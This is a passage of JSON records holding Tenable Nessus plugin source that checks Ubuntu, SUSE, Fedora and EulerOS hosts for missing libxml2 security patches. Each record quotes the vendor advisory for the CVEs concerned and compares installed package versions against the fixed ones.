value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libxml2\", pkgver:\"2.7.8.dfsg-5.1ubuntu4.17\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libxml2\", pkgver:\"2.9.1+dfsg1-3ubuntu4.9\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libxml2\", pkgver:\"2.9.3+dfsg1-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"libxml2\", pkgver:\"2.9.4+dfsg1-2ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:49", "description": "This update for libxml2 fixes several issues. Theses security issues were fixed :\n\n - CVE-2017-16932: Fixed infinite recursion could lead to an infinite loop or memory exhaustion when expanding a parameter entity in a DTD (bsc#1069689).\n\n - CVE-2017-15412: Prevent use after free when calling XPath extension functions that allowed remote attackers to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2 allowed remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-02-09T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : libxml2 (SUSE-SU-2018:0395-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-15412", "CVE-2017-16932", "CVE-2017-5130"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libxml2", "p-cpe:/a:novell:suse_linux:libxml2-doc", "p-cpe:/a:novell:suse_linux:libxml2-python", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2018-0395-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106707", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0395-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106707);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-16932\", \"CVE-2017-5130\");\n\n script_name(english:\"SUSE SLES11 Security Update : libxml2 (SUSE-SU-2018:0395-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes several issues. Theses security issues\nwere fixed :\n\n - CVE-2017-16932: Fixed infinite recursion could lead to\n an infinite loop or memory exhaustion when expanding a\n parameter entity in a DTD (bsc#1069689).\n\n - CVE-2017-15412: Prevent use after free when calling\n XPath extension functions that allowed remote attackers\n to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow\n in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5131/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16932/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5130/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180395-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?595b9055\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-libxml2-13458=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-libxml2-13458=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-libxml2-13458=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libxml2-32bit-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libxml2-32bit-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libxml2-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libxml2-doc-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libxml2-python-2.7.6-0.77.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:31", "description": "Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "nessus", "title": "Fedora 27 : libxml2 (2018-db610fff5b)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131", "CVE-2017-8872", "CVE-2017-9047"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-DB610FFF5B.NASL", "href": "https://www.tenable.com/plugins/nessus/106521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-db610fff5b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106521);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2017-8872\", \"CVE-2017-9047\");\n script_xref(name:\"FEDORA\", value:\"2018-db610fff5b\");\n\n script_name(english:\"Fedora 27 : libxml2 (2018-db610fff5b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-db610fff5b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"libxml2-2.9.7-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:38", "description": "Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-02-15T00:00:00", "type": "nessus", "title": "Fedora 26 : libxml2 (2018-a6b59d8f78)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131", "CVE-2017-8872", "CVE-2017-9047"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-A6B59D8F78.NASL", "href": "https://www.tenable.com/plugins/nessus/106828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-a6b59d8f78.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106828);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2017-8872\", \"CVE-2017-9047\");\n script_xref(name:\"FEDORA\", value:\"2018-a6b59d8f78\");\n\n script_name(english:\"Fedora 26 : libxml2 (2018-a6b59d8f78)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-a6b59d8f78\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"libxml2-2.9.7-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:28", "description": "According to the versions of the libxml2 packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.)CVE-2017-16932)\n\n - A flaw in libxml2 allows remote XML entity inclusion with default parser flags (i.e., when the caller did not request entity substitution, DTD validation, external DTD subset loading, or default DTD attributes). Depending on the context, this may expose a higher-risk attack surface in libxml2 not usually reachable with default parser flags, and expose content from local files, HTTP, or FTP servers (which might be otherwise unreachable).(CVE-2017-7375)\n\n - Buffer overflow in libxml2 allows remote attackers to execute arbitrary code by leveraging an incorrect limit for port values when handling redirects.(CVE-2017-7376)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-05-02T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : libxml2 (EulerOS-SA-2018-1089)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-16931", "CVE-2017-16932", "CVE-2017-7375", "CVE-2017-7376"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libxml2", "p-cpe:/a:huawei:euleros:libxml2-devel", "p-cpe:/a:huawei:euleros:libxml2-python", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1089.NASL", "href": "https://www.tenable.com/plugins/nessus/109487", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109487);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-5131\",\n \"CVE-2017-16931\",\n \"CVE-2017-16932\",\n \"CVE-2017-7375\",\n \"CVE-2017-7376\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : libxml2 (EulerOS-SA-2018-1089)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the libxml2 packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4,\n as used in Google Chrome before 52.0.2743.82, allows\n remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to\n function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles\n parameter-entity references because the NEXTL macro\n calls the xmlParserHandlePEReference function in the\n case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent\n infinite recursion in parameter\n entities.)CVE-2017-16932)\n\n - A flaw in libxml2 allows remote XML entity inclusion\n with default parser flags (i.e., when the caller did\n not request entity substitution, DTD validation,\n external DTD subset loading, or default DTD\n attributes). Depending on the context, this may expose\n a higher-risk attack surface in libxml2 not usually\n reachable with default parser flags, and expose content\n from local files, HTTP, or FTP servers (which might be\n otherwise unreachable).(CVE-2017-7375)\n\n - Buffer overflow in libxml2 allows remote attackers to\n execute arbitrary code by leveraging an incorrect limit\n for port values when handling redirects.(CVE-2017-7376)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1089\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0348b98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libxml2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libxml2-2.9.1-6.3.h10\",\n \"libxml2-devel-2.9.1-6.3.h10\",\n \"libxml2-python-2.9.1-6.3.h10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n 